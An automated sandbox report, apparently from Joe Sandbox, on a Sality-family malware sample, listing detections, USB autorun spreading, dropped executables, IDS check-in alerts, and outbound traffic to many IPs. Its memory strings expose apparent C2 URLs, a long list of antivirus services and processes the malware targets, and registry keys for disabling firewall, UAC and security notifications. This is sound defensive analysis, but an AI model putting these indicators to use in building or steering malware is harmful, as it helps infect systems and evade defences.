            Machine Learning detection for sample
            Source: PfBjDhHzvV.exeJoe Sandbox ML: detected
            Source: PfBjDhHzvV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: .objK.pdb source: SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDB0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: faawXJQQDELvfTymNiVz.exe, 0000001D.00000002.2629107069.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001E.00000002.2632453273.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 0000001F.00000000.1802713048.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000020.00000002.2625174200.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000021.00000000.1806477058.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000022.00000002.2626066877.000000000038E000.00000002.00000001.01000000.00000008.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2636248303.000000000038E000.00000002.00000001.01000000.00000008.sdmp

            Spreading

            barindex
            Yara detected Sality
            Source: Yara matchFile source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: PfBjDhHzvV.exe PID: 7272, type: MEMORYSTR
            Creates autorun.inf (USB autostart)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\autorun.infJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: z:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: y:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: x:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: w:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: v:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: u:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: t:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: s:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: r:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: q:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: p:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: o:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: n:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: m:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: l:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: k:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: j:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: i:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: h:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: g:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: f:Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\dllhost.exeFile opened: c:Jump to behavior
            Source: PfBjDhHzvV.exeBinary or memory string: [AutoRun]
            Source: PfBjDhHzvV.exeBinary or memory string: autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000F65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\autorun.infE
            Source: PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rxjetwu lmqoautorun.inftl
            Source: PfBjDhHzvV.exe, 00000000.00000002.2247577111.000000000527C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: [AutoRun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns6MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_7728SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
            Source: PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly Engine v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMB.loghttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV Engineavast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVENGINE.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRA
            Source: faawXJQQDELvfTymNiVz.exeBinary or memory string: autorun.inf
            Source: faawXJQQDELvfTymNiVz.exeBinary or memory string: [AutoRun]
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2788375210.000000000520E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2803863120.000000000575B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_01291060
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_0128A2F5

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49758 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49813 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49783 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49824 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49888 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49913 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49881 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49731 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49764 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49845 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49790 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62459 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62524 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49851 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62532 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62517 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62525 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62487 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62535 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62533 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62514 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62534 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62519 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62528 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62510 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49922 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62531 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62513 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:49943 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62521 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62516 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62529 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62527 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62522 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62522 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62518 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62526 -> 185.53.178.50:80
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62493 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2012736 - Severity 1 - ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62512 -> 190.120.227.91:8080
            Source: Network trafficSuricata IDS: 2018340 - Severity 1 - ET MALWARE Win32.Sality-GR Checkin : 192.168.2.7:62530 -> 185.53.178.50:80
            Creates HTML files with .exe extension (expired dropper behavior)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: rrco.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: pmcv.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: windtnq.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winmbftrd.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: wingljcv.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: wincshuip.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winwxfjkb.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: windxtl.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winuvylxx.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winftiwuh.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winyasen.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: vdbi.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winybvnr.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winfbuysn.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: nlnup.exe.0.dr
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: winitfun.exe.0.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: winysltfm.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: winmvfhu.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: winnqowgt.exe.35.dr
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeFile created: wingvdx.exe.35.dr
            Source: unknownNetwork traffic detected: IP country count 21
            Source: global trafficTCP traffic: 192.168.2.7:49725 -> 189.25.42.209:1338
            Source: global trafficTCP traffic: 192.168.2.7:49737 -> 190.120.227.91:8080
            Source: global trafficUDP traffic: 192.168.2.7:59786 -> 94.76.206.19:1473
            Source: global trafficUDP traffic: 192.168.2.7:59787 -> 46.45.148.196:5683
            Source: global trafficUDP traffic: 192.168.2.7:59788 -> 83.222.184.130:5750
            Source: global trafficUDP traffic: 192.168.2.7:59789 -> 58.140.114.152:5010
            Source: global trafficUDP traffic: 192.168.2.7:49975 -> 80.178.242.19:4630
            Source: global trafficUDP traffic: 192.168.2.7:49976 -> 61.95.152.112:6800
            Source: global trafficUDP traffic: 192.168.2.7:49977 -> 220.94.117.230:7066
            Source: global trafficUDP traffic: 192.168.2.7:49978 -> 58.85.93.82:4840
            Source: global trafficUDP traffic: 192.168.2.7:50037 -> 195.42.129.188:4876
            Source: global trafficUDP traffic: 192.168.2.7:50038 -> 81.180.90.149:9674
            Source: global trafficUDP traffic: 192.168.2.7:64958 -> 113.190.137.239:8112
            Source: global trafficUDP traffic: 192.168.2.7:64959 -> 89.45.97.101:4375
            Source: global trafficUDP traffic: 192.168.2.7:64960 -> 203.110.84.90:4882
            Source: global trafficUDP traffic: 192.168.2.7:64961 -> 121.243.130.85:6989
            Source: global trafficUDP traffic: 192.168.2.7:64962 -> 124.123.112.184:6219
            Source: global trafficUDP traffic: 192.168.2.7:64963 -> 121.135.15.57:4611
            Source: global trafficUDP traffic: 192.168.2.7:61625 -> 122.169.249.87:5878
            Source: global trafficUDP traffic: 192.168.2.7:61626 -> 183.83.119.156:6511
            Source: global trafficUDP traffic: 192.168.2.7:61627 -> 195.174.68.81:6296
            Source: global trafficUDP traffic: 192.168.2.7:61628 -> 77.81.225.89:6380
            Source: global trafficUDP traffic: 192.168.2.7:61629 -> 195.174.143.33:5960
            Source: global trafficUDP traffic: 192.168.2.7:61630 -> 117.239.49.110:5415
            Source: global trafficUDP traffic: 192.168.2.7:61631 -> 115.119.58.98:5310
            Source: global trafficUDP traffic: 192.168.2.7:61632 -> 93.114.177.116:4876
            Source: global trafficUDP traffic: 192.168.2.7:56335 -> 124.30.139.5:4294
            Source: global trafficUDP traffic: 192.168.2.7:56336 -> 95.64.101.42:5285
            Source: global trafficUDP traffic: 192.168.2.7:56337 -> 189.35.177.247:4490
            Source: global trafficUDP traffic: 192.168.2.7:56338 -> 95.76.49.203:4440
            Source: global trafficUDP traffic: 192.168.2.7:56339 -> 121.162.97.129:4900
            Source: global trafficUDP traffic: 192.168.2.7:56340 -> 115.98.98.230:5220
            Source: global trafficUDP traffic: 192.168.2.7:56341 -> 122.99.102.253:4980
            Source: global trafficUDP traffic: 192.168.2.7:56342 -> 77.81.224.130:7023
            Source: global trafficUDP traffic: 192.168.2.7:56343 -> 89.41.154.115:5038
            Source: global trafficUDP traffic: 192.168.2.7:56344 -> 89.45.96.223:5614
            Source: global trafficUDP traffic: 192.168.2.7:56345 -> 195.239.22.166:6065
            Source: global trafficUDP traffic: 192.168.2.7:56346 -> 188.215.26.241:6260
            Source: global trafficUDP traffic: 192.168.2.7:56347 -> 93.114.228.238:5959
            Source: global trafficUDP traffic: 192.168.2.7:56348 -> 46.248.223.58:5545
            Source: global trafficUDP traffic: 192.168.2.7:56349 -> 77.81.228.77:6130
